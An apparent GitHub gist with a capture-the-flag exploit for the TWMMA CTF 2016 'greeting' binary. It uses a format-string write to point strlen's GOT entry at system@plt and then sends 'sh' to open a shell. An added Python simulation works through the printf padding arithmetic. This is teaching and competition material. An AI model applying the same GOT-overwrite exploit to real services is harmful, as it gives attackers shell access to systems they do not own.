@tsunpoko
Last active September 20, 2016 11:25
[TWMMA CTF 2016] Pwn greeting
from No___Op import *   # author's private helper library: Pwning, p32, info_pay
import sys

# Local copy on port 4444 by default; any command-line argument selects the CTF service.
if len(sys.argv) < 2:
    target = "localhost:4444"
else:
    target = "pwn2.chal.ctf.westerns.tokyo:16317"

plt = {
    'system': 0x08048490
}
got = {
    'strlen': 0x8049a54,
    'puts'  : 0x8049a44,
    'printf': 0x8049a38
}

c = Pwning( target )

# Format-string payload. "aa" pads the start so the three addresses are
# 4-byte aligned and land at positional arguments 12, 13 and 14.
# `fini` is not defined anywhere in this gist (presumably the .fini_array
# entry of the binary); the first %hhn writes one byte there, the two %hn
# writes put the halves of system@plt (0x8490, then 0x0804) into strlen's
# GOT entry, so the next call to strlen() is really a call to system().
payload = 'aa'
payload += p32(fini)
payload += p32(got['strlen'])
payload += p32(got['strlen'] + 2)
payload += '%223x'                          # count reaches 255, assuming an 18-byte
payload += '%12$hhn'                        # "Nice to meet you, " prefix + 14 payload bytes
payload += '%' + str(33713 - 0x20) + 'x'    # 33681 more -> count 33936 = 0x8490
payload += '%13$hn'
payload += '%' + str(33907 - 255) + 'x'     # 33652 more -> count 0x10804, low half 0x0804
payload += '%14$hn'
payload += '\n'
c.write(payload)
info_pay(payload)

# Second round: the name is handed to strlen(), now resolved to system(), so "sh" spawns a shell.
c.write('sh\n')
c.shell()
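Added example (my code, not part of the gist or of tsunpoko's No___Op library): a Python 3 reconstruction of the padding arithmetic behind the widths 223, 33713 - 0x20 and 33907 - 255, followed by a small model of printf's %x / %hhn / %hn accounting run over the rebuilt payload to check where each byte lands. It assumes the binary prints the name after the 18-byte prefix "Nice to meet you, " before the attacker-controlled format string (the only starting count that makes the gist's widths come out as written). The address the gist calls fini is not given there, so 0xdeadbee0 is a placeholder; the stack layout and the 0x41414141 filler words are constructed for the simulation.

```python
import re
import struct

# Values from the gist; FINI is a placeholder because the gist never defines fini.
PREFIX = b"Nice to meet you, "   # assumed bytes printf emits before the name
FINI = 0xdeadbee0                # placeholder address for the first %hhn write
STRLEN_GOT = 0x8049a54
SYSTEM_PLT = 0x08048490


def p32(v):
    return struct.pack("<I", v)


def paddings(printed, writes):
    """%Nx widths for the (value, bits) writes so that, when each %hhn/%hn
    fires, the running byte count equals value modulo 2**bits.  Widths stay
    >= 8 (the hex digits of a 32-bit argument) so %x never prints more than
    asked for; this also avoids a zero width."""
    pads, count = [], printed
    for value, bits in writes:
        mod = 1 << bits
        pad = (value - count) % mod
        while pad < 8:
            pad += mod
        pads.append(pad)
        count += pad
    return pads


def build_payload(fini_byte=0xff):
    """Rebuild the gist's payload from its targets.  'aa' aligns the three
    addresses so they sit at positional arguments 12, 13 and 14."""
    head = b"aa" + p32(FINI) + p32(STRLEN_GOT) + p32(STRLEN_GOT + 2)
    writes = [(fini_byte, 8), (SYSTEM_PLT & 0xffff, 16), (SYSTEM_PLT >> 16, 16)]
    pads = paddings(len(PREFIX) + len(head), writes)
    fmt = b"%%%dx%%12$hhn%%%dx%%13$hn%%%dx%%14$hn" % tuple(pads)
    return head + fmt, pads


SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)(hh|h)?([xn])")


def simulate_printf(fmt, stack, memory, printed=0):
    """Model of printf's accounting for the conversions the payload uses.
    stack: 1-based argument index -> 32-bit value; memory: address -> byte.
    Positional arguments do not advance the sequential counter, as in glibc."""
    count, seq, pos = printed, 1, 0
    while pos < len(fmt):
        m = SPEC.match(fmt, pos)
        if not m:
            count += 1          # literal byte (including the embedded addresses)
            pos += 1
            continue
        argidx, width, size, conv = m.groups()
        if argidx:
            arg = stack[int(argidx)]
        else:
            arg, seq = stack[seq], seq + 1
        if conv == b"x":
            count += max(len(b"%x" % arg), int(width or 0))
        else:
            for i in range({b"hh": 1, b"h": 2, None: 4}[size]):
                memory[arg + i] = (count >> (8 * i)) & 0xff
        pos = m.end()
    return count


def run_gist_exploit():
    """Return (widths, byte written at FINI, dword now in strlen's GOT slot)."""
    payload, pads = build_payload()
    stack = {i: 0x41414141 for i in range(1, 12)}   # constructed filler words
    stack[12], stack[13], stack[14] = FINI, STRLEN_GOT, STRLEN_GOT + 2
    memory = {}
    simulate_printf(payload, stack, memory, printed=len(PREFIX))
    got = sum(memory[STRLEN_GOT + i] << (8 * i) for i in range(4))
    return pads, memory[FINI], got


if __name__ == "__main__":
    pads, fini_byte, got = run_gist_exploit()
    print(pads, hex(fini_byte), hex(got))
```

paddings() is the check worth keeping around when a computed width comes out small or zero: %x prints at least the digits of the argument it consumes, so a width below 8 would overshoot the count and the next %hn would write the wrong value. The sequential %Nx conversions here eat arguments 1 to 3, which is why the addresses must be placed at 12 to 14 and addressed positionally.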